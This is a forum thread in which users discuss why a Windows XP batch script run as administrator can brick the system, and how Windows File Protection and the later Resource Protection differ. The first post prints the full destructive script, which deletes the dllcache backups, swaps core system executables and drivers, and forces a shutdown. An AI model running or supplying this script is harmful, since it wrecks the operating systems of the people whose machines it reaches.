XP security

[Burnsy2023]

I was amazed when I tried running this script in a VM as an admin (as many people do) and found that it did indeed manage to brick the install. Surely a script kiddy would be foiled by rudimentary OS security?

@echo off
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
tskill explorer
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA

I was under the impression that all of these would surely either have sharing violations on them or complete file permissions failures.

Can someone explain to me how this manages to work and why people on XP still insist on running XP as admin?

 

[J.B]

Im actually surprised that worked inside of Windows.

That seems crazy when you think about it.

have you tried just running parts of it at a time? Im just surprised it let you rename explorer.exe

 

[Burnsy2023]

Im actually surprised that worked inside of Windows.

That seems crazy when you think about it.

have you tried just running parts of it at a time? Im just surprised it let you rename explorer.exe

Indeed. I was just as amazed. I ran the top bit before the shutdown command. No errors bar the copying of taskmanager.

 

[edscdk]

Im actually surprised that worked inside of Windows.

That seems crazy when you think about it.

have you tried just running parts of it at a time? Im just surprised it let you rename explorer.exe

running as an admin it did what I expected... though I would have thought

DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"

would have failed due to being open... (though my thinking is obviously wrong)

 

[Burnsy2023]

would have failed due to being open... (though my thinking is obviously wrong)

Indeed. I expected sharing violations. How was it able to still run?

 

[SiriusB]

That is a bit worrying. And strangely irritating since there have been so many times I couldn't delete a bloody text file I had created - nevermind running, critical OS executables!

 

[yashiro]

You can do anything you like as admin. I don't get why you are surprised. You can brick any OS by running similar destructive commands as the root user.

As to why people run as admin? Windows makes the default user the admin when you install it. People neither know, or care, to change from this default.

 

[SiriusB]

It is almost never a good idea to move, rename or delete core OS executables. The surprise is more in that the OS let it happen without any complaints, rather than it being possible.

 

[Burnsy2023]

It is almost never a good idea to move, rename or delete core OS executables. The surprise is more in that the OS let it happen without any complaints, rather than it being possible.

There isn't even a confirmation prompt.

 

[edscdk]

There isn't even a confirmation prompt.

someone stupid enough to try and delete those files in the first place will not be put off by a confirmation prompt!!

dont the file permissions get locked down more if you apply the highsec thing??

 

[markweatherill]

a script kiddy would be foiled

How did you get the script onto the machine?

 

[Burnsy2023]

How did you get the script onto the machine?

I just copy and pasted it, but I'm sure it could be automated easily enough.

 

[tntcoder]

Reason it works is because the exe files in the dllcache folder are not in use (hence not locked), these are backups for use by Windows File Protection. As admin you can delete these.

You can't however delete the exe's in c:\windows\ e.g c:\windows\explorer.exe because it is in use/locked, but you can rename them (as per the script). Rename is only changing NTFS header/node information, not the data on disk so you can get away with it.

Once you delete the secure backup copy in dllcache and rename the main c:\windows executable, on the next boot it can neither repair from cache or find the executable as it has been renamed.

So it works because you're an admin and because you're pwning the WFP feature that would fix the system if you only deleted/renamed c:\windows\explorer.exe without messing with the backup cache.

 

[SiriusB]

Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes Admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing, doesn't mean I'd be OK with her hacking off a limb!

 

[Burnsy2023]

Does anyone have a Vista/7 VM they could try this on? I take it it wouldn't work with the new security model?

 

[tntcoder]

Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes Admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing, doesn't mean I'd be OK with her hacking off a limb!

Yer I agree, maybe MS could have designed WFP slightly better and put its backups in a separate locked read-only partition or something. I think though you have to have the all powerful admin, and you can't really double-prompt on file delete without a kernel level blacklist. I think it would just get messy from an OS design point of view. Far easier to just trust the admin knows what he's doing and shift the work onto him

Still XP has always had admin over use problems, and this is not so much of an issue on new up to date OSs.

 

[Burnsy2023]

Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes Admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing, doesn't mean I'd be OK with her hacking off a limb!

In all fairness, I like proper God mode, it can be very useful to just be able to do what you know is correct. However, this power should not be bestowed on a user lightly.

 

[tntcoder]

Does anyone have a Vista/7 VM they could try this on? I take it it wouldn't work with the new security model?

On Vista+ it's much better.

Windows Resource Protection replaced Windows File Protection, files are now stored in c:\windows\winsxs rather than dllcache and only a 'TrustedInstaller' can modify these, so even an administrator can't touch them. However as an admin you can take ownership of the files and then do it, but it's a good extra hurdle.

 

[SiriusB]

Well yeah, I'd be annoyed if I couldn't do something. But there is a serious problem when a script can do all that damage in just a few seconds.

Although I suppose this is what UAC and other measures are designed to address. Still bloody worrying to think how easy it is to screw over XP.

 

[Confused]

Yup, renames of "in-use" files is a common thing.

In fact, I have used it fairly regularly when trying to update an application in use from a shared folder on a server.

The existing process continues to use the newly renamed application, but any subsequent calls to the executable will load the newer version.

Then, when I'm sure that all old processes are no longer in use (by looking at "Open Files" in Computer Management) I can delete the old, now-renamed, executable.